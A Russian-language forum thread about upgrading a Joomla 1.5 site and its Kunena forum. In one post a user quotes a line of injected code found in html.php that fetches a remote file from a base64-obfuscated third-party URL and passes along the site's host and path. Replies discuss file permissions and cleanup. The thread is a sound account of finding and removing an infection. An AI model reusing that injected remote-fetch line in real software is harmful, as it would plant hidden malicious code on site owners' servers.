Joomla 4. Компонент K2 и форк K2ForJ4 (18 янв 2024)

Если вас, как и меня, достало выслушивать (вычитывать) бесконечные обещания разработчика K2 опубликовать версию компонента K2 под Joomla 4 (без чего невозможно реализовать апгрейд from Joomla 3 to Joomla 4) - воспользуйтесь форком K2ForJ4. Который в данный момент установлен и без каких-либо проблем работает на этом веб-сайте.

Upgrade Joomla 1.5

Больше
11 года 11 мес. назад #11 от mmik
mmik ответил в теме Re: Upgrade Joomla 1.5
Мда, как-то грустно все...
В общем вчера как-то удалось запустить сайт, то, что я увидела - меня ужаснуло. Половина статей пустые, не хватает многих картинок. В статьях, где вставлен flash - пусто. Как уже писала, kunena нет вообще, все таблицы kunena перенесены с другими именами...
я подумала, что дело еще может быть в том, что переходила с 1.5.21 а не с 1.5.25. Решила обновиться до 1.5.25 для начала.... там такое вылезло. Сижу думаю откуда взялось и чем мне это грозит. При обновлении до 1.5.23 выдало ошибку в libraries\joomla\document\html в 521 строке
Code:
$ver = $content->fetch_remote_file(JFactory::getB('b3RrYXRzLnJ1L3dwLWFkbWluL2ppbS5waHA/cmVmPQ==').$jsite->_host.'&d='.$jsite->_path);
как мне объяснили, то что зашифровано - это
Code:
otkats.ru/wp-admin/jim.php?ref
ссылка на сторонний сайт, вредоносный код :(
это как-то лечится?

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Dev banner 3
Больше
11 года 11 мес. назад #12 от mmik
mmik ответил в теме Re: Upgrade Joomla 1.5
Скачала архив 1.5.25 с официального сайта. Закинула в свой сайт пакеты обновления 1.5.21->1.5.23->1.5.24->1.5.25 и после этого просто скопировала файл libraries/joomla/document/html/html.php из скаченного архива. Работает.
Эта гадость может быть еще где нибудь?
Надо бы на хостинге сделать то же самое. Я вообще разумно поступила?

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
11 года 11 мес. назад - 11 года 11 мес. назад #13 от Aleksej
Aleksej ответил в теме Re: Upgrade Joomla 1.5

mmik пишет: как мне объяснили, то что зашифровано - это ссылка на сторонний сайт, вредоносный код. это как-то лечится?

Мы уже говорили на эту тему; 0777 для всех огульно файлов/каталогов joomla - неприемлемы. Вы это, надеюсь, убрали? Самый лучший и гарантированный способ подцепить такого рода гадость, как вот эта у вас.

Касательно "половина статей - пустые" - здесь я бы обратил внимание на два момента;
  • Вы используете именно последнюю версию компонента, загруженную с сайта разработчика? Только так, и никак иначе.
  • В настройках компонента ни в коем случае не меняйте префикс таблиц базы данных нового сайта; оставьте как есть. Отредактировать можно лишь старый префикс.
А вообще - непривычно много ошибок, с ваших слов. Я ведь не раз и не два использовал этот компонент, траблы безусловно есть, но не такие ужасающие.
Последнее редактирование: 11 года 11 мес. назад пользователем Aleksej.

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
11 года 11 мес. назад - 11 года 11 мес. назад #14 от Aleksej
Aleksej ответил в теме Re: Upgrade Joomla 1.5

mmik пишет: Скачала архив 1.5.25 с официального сайта. Закинула в свой сайт пакеты обновления 1.5.21->1.5.23->1.5.24->1.5.25 и после этого просто скопировала файл libraries/joomla/document/html/html.php из скаченного архива. Работает.
Эта гадость может быть еще где нибудь?
Надо бы на хостинге сделать то же самое. Я вообще разумно поступила?

Вполне, думаю.

Порой практикуется способ распаковать полный архив Joomla в публичный каталог сайта; попросту сверху. Нелучшее решение по ряду причин, но нередко вполне успешно работает. А уж один-два файла заменить - святое дело.

Что касается того - может ли быть гадость еще где-нибудь... да может, конечно. Особенно учитывая то обстоятельство, что были три семерки для всего подряд на сайте, насколько я вас понял. Сложно посоветовать что-либо кардинальное; могу лишь порекомендовать парочку лечебных скриптов.

Глобального решения для лечения проблем такого рода я не знаю.
Последнее редактирование: 11 года 11 мес. назад пользователем Aleksej.

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
11 года 11 мес. назад #15 от Aleksej
Aleksej ответил в теме Re: Upgrade Joomla 1.5

mmik пишет: В статьях, где вставлен flash - пусто.

Flash лучше прописать заново, это несложно. Хотя у меня не было таких проблем.

Рекомендую для вставки flash в статьи использовать modules_anywhere и sourcerer; эти совершенно незаменимые для джумловода расширения вы можете без проблем скачать с сайта Nonumber .

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
11 года 11 мес. назад #16 от mmik
mmik ответил в теме Re: Upgrade Joomla 1.5
Спасибо за советы! Скопировать архив joomla поверх - это мысль! Надо попробовать!
К сожалению, мои проблемы не в 777, все еще хуже. Я нашла старинную версию сайта, на которой я упражнялась на локалке, на хостинге никогда эта копия сайта не была, там тоже самое!
Flash вставляю непосредственно в статью. Сейчас статей с flash порядка 50.
Сначала надо вылечить то, что есть.
Еще вопрос... смогла я обновиться с 1.5.21 до 1.5.25, а такими же мелкими шажками можно обновиться дальше?

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
11 года 11 мес. назад #17 от Aleksej
Aleksej ответил в теме Re: Upgrade Joomla 1.5
"Такими же мелкими шажками" - до J1.5.26 только. Дальше все, дороги нет. Только jUpgrade. :)

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
11 года 11 мес. назад #18 от mmik
mmik ответил в теме Re: Upgrade Joomla 1.5
В общем-то ничего плохого больше на сайте не нашлось. Это радует. Но проблема перехода все так же актуальна. Уже почти готова ставить чистый 2.5 на поддомен и вручную переносить туда статьи. id, алиасы статей, категорий меню менять вручную в БД на старые, чтоб сохранить ссылки. Вид ссылок будет прежний? Такого типа:
Code:
index.php?option=com_content&view=article&id=736:1&catid=38:88
Но вот что с kunena делать? У меня была мысль поставить на 2.5 kunena 1.6, в БД перетащить ручками все таблицы. И будет мне щастье, а потом уж обновляться дальше до 1.7. Но возникла мысль, что 1.6 на 2.5 не встанет. Или встанет?

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
11 года 11 мес. назад - 11 года 11 мес. назад #19 от Aleksej
Aleksej ответил в теме Re: Upgrade Joomla 1.5

mmik пишет: Уже почти готова ставить чистый 2.5 на поддомен и вручную переносить туда статьи. id, алиасы статей, категорий меню менять вручную в БД на старые, чтоб сохранить ссылки. Вид ссылок будет прежний?

Вы уж, воля ваша, что-то странное придумали. :)

jUpgrade, обновляя Joomla до актуальной v.2.5, без никаких проблем переносит kunena; это расширение является знаковым для Joomla и девелопер расстарался.

Со ссылками - интересный момент; прочтите внимательно пояснения Матиаса , специально терзал его в контексте этого вопроса. Многое зависит от настроек форума на вашем старом сайте; у меня вот, скажем, вид ссылок безусловно изменился, но новые ссылки доступны и по старым ссылкам тоже.

Вообще, конечно, здесь имеет место скользкий момент; очень внимательно вчитайтесь в текст по приведенной выше ссылке. Но вот так вот, руками, переносить весь форум - это, на мой взгляд, перебор.


Добавлю. Если ситуация у вас с конфигом форума иная, нежели у меня - правильнее было бы создать единое правило перенаправления, работающее для всех ссылок форума. Но это уже исходя из конкретной ситуации; у нас тут была такая мысль, но, к счастью, обошлись.
Последнее редактирование: 11 года 11 мес. назад пользователем Aleksej.

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
11 года 11 мес. назад #20 от mmik
mmik ответил в теме Re: Upgrade Joomla 1.5

без никаких проблем переносит kunena

у меня kunena вообще не перенеслась, я писала об этом. "Затык" у меня именно в форуме. И в принципе, не страшно ручками скопировать таблицу из одной бд в другую бд. Если структура таблиц одинаковая, конечно.
Я еще попробую мигрировать на 2.5, буду надеяться, что в следующий раз мне повезет больше.

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Работает на Kunena форум